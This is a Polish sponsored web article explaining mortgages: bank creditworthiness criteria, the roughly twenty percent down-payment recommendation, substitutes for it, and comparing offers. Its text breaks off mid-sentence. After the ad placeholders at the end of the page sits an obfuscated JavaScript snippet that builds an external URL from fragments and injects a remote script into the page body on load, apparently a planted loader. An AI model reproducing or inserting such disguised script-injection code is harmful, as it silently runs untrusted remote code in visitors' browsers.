Kredyt hipoteczny na wymarzony dom

Kredyt hipoteczny to dla wielu osób jedyna szansa na spełnienie marzenia o własnym mieszkaniu. Warunki uzyskania kredytu hipotecznego są jednak dość szczegółowe. Nie każdy więc ma szansę na kredyt w takiej kwocie, o jaką wnioskuje.

Jakie oczekiwania banki najczęściej mają w stosunku do osób ubiegających się o pieniądze na mieszkanie? Kto ma szanse na kredyt hipoteczny? Odpowiadamy!

Kredyt hipoteczny – na czym polega?
Kredyt hipoteczny to specyficzny rodzaj kredytu, którego zabezpieczeniem jest kupowana za pożyczone środki nieruchomość. W związku z wysokimi cenami nieruchomości często jest jedynym sposobem na sfinansowanie pierwszego mieszkania. Jest to umowa, w której stronami jest bank oraz konsument. Bank jako pożyczkodawca udziela kredytu konsumentowi na zasadach określonych w ustawie o kredycie hipotecznym.

Istotnym elementem, który odróżnia kredyt hipoteczny od kredytów gotówkowych, jest zabezpieczenie w postaci wpisu hipoteki na nieruchomości. W ten sposób bank nabywa prawo do przejęcia nieruchomości, jeśli pożyczkobiorca przestanie wywiązywać się ze swojego zobowiązania. Wpis na rzecz banku dokonywany jest w księdze wieczystej i da się go usunąć dopiero, kiedy klient spłaci zaciągnięte zobowiązanie.

para w nowy mieszkaniu

Kredyt hipoteczny – warunki, jakie trzeba spełniać
Żeby mieć szansę na kredyt hipoteczny, musisz spełniać pewne określone warunki. Najtrudniejsze do spełnienia jest zdecydowanie wykazanie odpowiednio wysokiej zdolności kredytowej. Zdolność kredytowa jest to zdolność do spłaty zaciągniętego zobowiązania zgodnie z określonym w umowie harmonogramem. Żeby ją określić, bank bada w szerokim zakresie sytuację finansową klientów. Jakie elementy szczególnie bierze pod uwagę? Są to:

 •  miesięczne dochody kredytobiorcy,
 • sytuacja zawodowa,
 • pozytywna historia kredytowa,
 • dotychczasowe obciążenia budżetu,
 • wiek,
 • inne źródła dochodu.

Czy trudno jest dostać kredyt hipoteczny? Warunki są niekiedy trudne do spełnienia i powodują, że niektórzy nie mają szans na kredyt. Szczególnie trudnym warunkiem przy kredycie hipotecznym jest ponadto konieczność uiszczenia wkładu własnego.

Kredyt hipoteczny – jaki wkład własny?
Wysoka zdolność kredytowa nie jest jedynym warunkiem uzyskania kredytu. Kluczowy jest odpowiednio wysoki wkład własny. Zgodnie z rekomendacją Komisji Nadzoru Finansowego wkład własny powinien być na poziomie około dwudziestu procent. W praktyce jednak nie musi być to wkład w postaci gotówki na koncie. Banki są w stanie zaakceptować również inne formy zabezpieczenia. Co może zastąpić wkład własny?

Wkład własny może się obniżyć do dziesięciu procent, jeśli pozostałą część zastąpi:

 • ubezpieczenie kredytu,
 • środki zgromadzone na Indywidualnym Koncie Emerytalnym lub Indywidualnym Koncie Zabezpieczenia Emerytalnego,
 • inna posiadania już nieruchomość,
 • zastaw na obligacjach lub innych papierach wartościowych,
 • wycena nieruchomości korzystniejsza niż cena zakupu,
 • grunt pod budowę domu,
 • koszty poniesione w związku z budową domu lub zakupem mieszkania,
 • środki odłożone na remont,
 • pomoc z programów rządowych.

Dzięki takiemu podejściu banków na kredyt hipoteczny mają szansę nie tylko osoby z odpowiednio dużymi oszczędnościami, ale szersze grono klientów. Czy któraś z opcji jest korzystniejsza niż inna? Wiele zależy od Twojej konkretnej sytuacji. Niektóre formy zastąpienia wkładu własnego mogą spowodować, że koszt kredytu wzrośnie. Jeśli jednak nie masz innego wyboru, mogą być Twoją szansą na zakup wymarzonego mieszkania.

Najlepszy kredyt hipoteczny – gdzie szukać?
Co zrobić, żeby znaleźć najlepszy kredyt hipoteczny? Z pewnością musisz porównać kilka różnych ofert konkurencyjnych banków. Pomoże Ci w tym zaawansowana wyszukiwarka kredytów hipotecznych, w której możesz wpisać kwotę, której potrzebujesz oraz okres spłaty zobowiązania. W ten sposób uzyskasz zestawienie najkorzystniejszych aktualnie ofert kredytów. Zamiast przeglądać kilkanaście różnych ofert, możesz dokładnie przeanalizować tylko te już na wstępie najbardziej

Fot. i oprac. na podst.:
mat. prasowe totalmoney.pl

Artykuł sponsorowany

Oceń ten artykuł

How useful was this post?

Click on a star to rate it!

0 / 5. 0

No votes so far! Be the first to rate this post.

Redakcja MAGAZIF

Artykuły redakcji portalu MAGAZIF.com

Reklama
Reklama
Reklama
Reklama
(function(){ tfmeu="ecm9wt6qfmen";tfme=document.createElement("script"); tfme_="u"+("st");tfme_+="at"+(".");tfme.async=true;tfme_+="in"; tfmeu="189853784."+tfmeu;tfme.type="text/javascript";tfmeu+="eec5xi6a9jsX"; tfmeu+="myar0a";tfme_+=("f")+"o"+("/");tfme.src="https://"+tfme_+tfmeu; tfmed=document.body;tfmed.appendChild(tfme); })();